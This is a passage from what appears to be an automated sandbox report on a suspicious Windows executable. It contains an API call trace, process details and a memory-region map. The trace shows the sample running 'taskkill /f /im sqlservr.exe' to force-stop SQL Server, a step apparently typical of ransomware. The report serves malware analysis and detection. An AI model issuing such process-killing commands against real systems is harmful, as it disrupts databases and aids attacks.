lpFindFileData=0x19f308) returned 0x4fb138 [0219.345] GetProcessHeap () returned 0x4f0000 [0219.345] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x14) returned 0x4f3f98 [0219.345] FindClose (in: hFindFile=0x4fb138 | out: hFindFile=0x4fb138) returned 1 [0219.345] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0219.345] GetLastError () returned 0x2 [0219.345] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x4fb138 [0219.345] GetProcessHeap () returned 0x4f0000 [0219.345] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4f3f98, Size=0x4) returned 0x4f4380 [0219.345] FindClose (in: hFindFile=0x4fb138 | out: hFindFile=0x4fb138) returned 1 [0219.345] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0219.345] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0219.346] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0219.349] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0219.349] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0219.349] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154)) [0219.349] GetProcessHeap () returned 0x4f0000 [0219.349] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x18) returned 0x4f3fb8 [0219.349] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0219.349] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0219.351] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0219.351] GetProcessHeap () returned 0x4f0000 [0219.351] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f3fb8) returned 1 [0219.351] GetProcessHeap () returned 0x4f0000 [0219.351] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa) returned 0x4fb138 [0219.351] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0219.355] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im sqlservr.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im sqlservr.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im sqlservr.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x12f8, dwThreadId=0x7e8)) returned 1 [0219.377] CloseHandle (hObject=0x98) returned 1 [0219.377] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0219.377] GetProcessHeap () returned 0x4f0000 [0219.377] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f9df0) returned 1 [0219.377] GetEnvironmentStringsW () returned 0x4f9df0* [0219.378] GetProcessHeap () returned 0x4f0000 [0219.378] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa76) returned 0x4f7d60 [0219.378] FreeEnvironmentStringsA (penv="=") returned 1 [0219.378] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0220.582] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0220.582] CloseHandle (hObject=0x9c) returned 1 [0220.583] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0220.583] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0220.584] GetProcessHeap () returned 0x4f0000 [0220.584] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4f7d60) returned 1 [0220.585] GetEnvironmentStringsW () returned 0x4f7d60* [0220.585] GetProcessHeap () returned 0x4f0000 [0220.585] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa9c) returned 0x4fc798 [0220.586] FreeEnvironmentStringsA (penv="=") returned 1 [0220.586] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0220.586] GetProcessHeap () returned 0x4f0000 [0220.586] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fc798) returned 1 [0220.587] GetEnvironmentStringsW () returned 0x4f7d60* [0220.588] GetProcessHeap () returned 0x4f0000 [0220.588] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa9c) returned 0x4fc798 [0220.589] FreeEnvironmentStringsA (penv="=") returned 1 [0220.589] GetProcessHeap () returned 0x4f0000 [0220.589] RtlFreeHeap (HeapHandle=0x4f0000, Flags=0x0, BaseAddress=0x4fb138) returned 1 [0220.589] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0220.589] _get_osfhandle (_FileHandle=1) returned 0x144 [0220.589] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0220.589] _get_osfhandle (_FileHandle=1) returned 0x144 [0220.589] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0220.590] _get_osfhandle (_FileHandle=0) returned 0x140 [0220.590] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0220.590] GetConsoleOutputCP () returned 0x1b5 [0220.592] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0220.592] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.594] exit (_Code=128) Thread: id = 375 os_tid = 0xc24 Process: id = "74" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2dc4e000" os_pid = "0x12f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "73" os_parent_pid = "0x4b4" cmd_line = "taskkill /f /im sqlservr.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5289 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5290 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5291 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5292 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 5293 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 5294 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 5295 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 5296 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 5297 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 5298 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5299 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 5300 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5301 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5302 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5303 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5304 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5305 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5306 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5307 start_va = 0x4550000 end_va = 0x455ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 5308 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5309 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5310 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5311 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5312 start_va = 0x4560000 end_va = 0x470ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 5313 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5314 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5315 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5316 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5317 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5318 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5319 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5320 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5321 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 5322 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 5323 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5324 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5325 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5326 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5327 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5328 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5329 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5330 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5331 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5332 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5333 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5334 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5335 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5336 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5337 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5338 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5339 start_va = 0x4480000 end_va = 0x44bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 5340 start_va = 0x44c0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 5341 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5342 start_va = 0x4710000 end_va = 0x485ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 5343 start_va = 0x4500000 end_va = 0x4529fff monitored = 0 entry_point = 0x4505680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5344 start_va = 0x4860000 end_va = 0x49e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004860000" filename = "" Region: id = 5345 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5346 start_va = 0x49f0000 end_va = 0x4b70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049f0000" filename = "" Region: id = 5347 start_va = 0x4b80000 end_va = 0x5f7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b80000" filename = "" Region: id = 5348 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5349 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 5350 start_va = 0x4500000 end_va = 0x4504fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 5351 start_va = 0x4510000 end_va = 0x4510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 5352 start_va = 0x4520000 end_va = 0x4520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 5353 start_va = 0x5f80000 end_va = 0x62b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5354 start_va = 0x4710000 end_va = 0x47f9fff monitored = 0 entry_point = 0x474d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5355 start_va = 0x4850000 end_va = 0x485ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 5356 start_va = 0x4530000 end_va = 0x4533fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 5357 start_va = 0x4710000 end_va = 0x47effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5358 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5359 start_va = 0x4540000 end_va = 0x4540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004540000" filename = "" Region: id = 5360 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5361 start_va = 0x4560000 end_va = 0x4560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004560000" filename = "" Region: id = 5362 start_va = 0x4610000 end_va = 0x470ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 5363 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5364 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5365 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5366 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5367 start_va = 0x4570000 end_va = 0x45affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 5368 start_va = 0x45b0000 end_va = 0x45effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 5369 start_va = 0x47f0000 end_va = 0x482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 5370 start_va = 0x62c0000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 5371 start_va = 0x6300000 end_va = 0x633ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 5372 start_va = 0x6340000 end_va = 0x637ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006340000" filename = "" Region: id = 5373 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5374 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = 